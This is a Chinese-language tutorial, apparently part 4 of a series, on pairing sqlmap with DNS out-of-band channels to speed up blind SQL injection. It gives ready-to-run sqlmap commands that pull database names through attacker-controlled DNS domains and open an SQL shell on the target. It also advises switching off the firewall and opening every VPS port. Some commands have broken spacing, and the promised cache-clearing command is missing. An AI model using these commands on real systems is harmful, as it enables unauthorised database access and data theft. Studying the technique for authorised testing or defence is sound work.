手把手带你利用SQLmap结合OOB技术实现音速盲注(4)

第十五步：故障排查

如果无法正常收到DNS请求，那么可能是防火墙策略。关闭Ubuntu防火墙的命令是：sudoufwdisable

也可能是或者VPS上存在安全策略阻塞，再去VPS控制台上检测是否存在安全组策略，全部放通即可。例如华为VPS默认只开发部分端口，手动勾选全部放通即可。

一般vps均自带python2的环境，因此python2的环境不需要再次安装。在114.114.123.120中安装sqlmap，sqlmap的安装命令为： git clonegit://github.com/sqlmapproject/sqlmap.git，安装好后，进入sqlmap目录，并执行python sqlmap.py，看能够正常回显即可正常使用sqlmap

sqlmap指定使用时间盲注方式注入，并读取当前数据库名的命令如下：

python sqlmap.py -u "?id=1"--tech=T --dbms=mysql --current-db --batch

先演示使用传统的sqlmap时间盲注，8个字母耗时1分46秒，如下图所示。

再使用基于DNS的OOB技术进行注入，为了避免作弊，首先要清除上一次sql注入的缓存。缓存文件位置和清除命令如下：

接着使用本文介绍的sqlmap基于dns通道进行OOB注入，仅仅耗时1秒，执行时间盲注的命令如下：

python sqlmap.py -u "?id=1"--tech=T --dbms=mysql --dns-domain=fuzi666.xyz --current-db –batch

弹个sql-shell回来：

python sqlmap.py -u "?id=1"--tech=T --dbms=mysql --dns-domain=13fuzi.com --sql-shell --batch

查询数据库名，耗时4秒。查询数据库名的sql语句如下：

select schema_name frominformation_schema.schemata;

https://www.cnblogs.com/backlion/p/8984121.html

https://www.freebuf.com/column/184587.html

https://www.cnblogs.com/afanti/p/8047530.html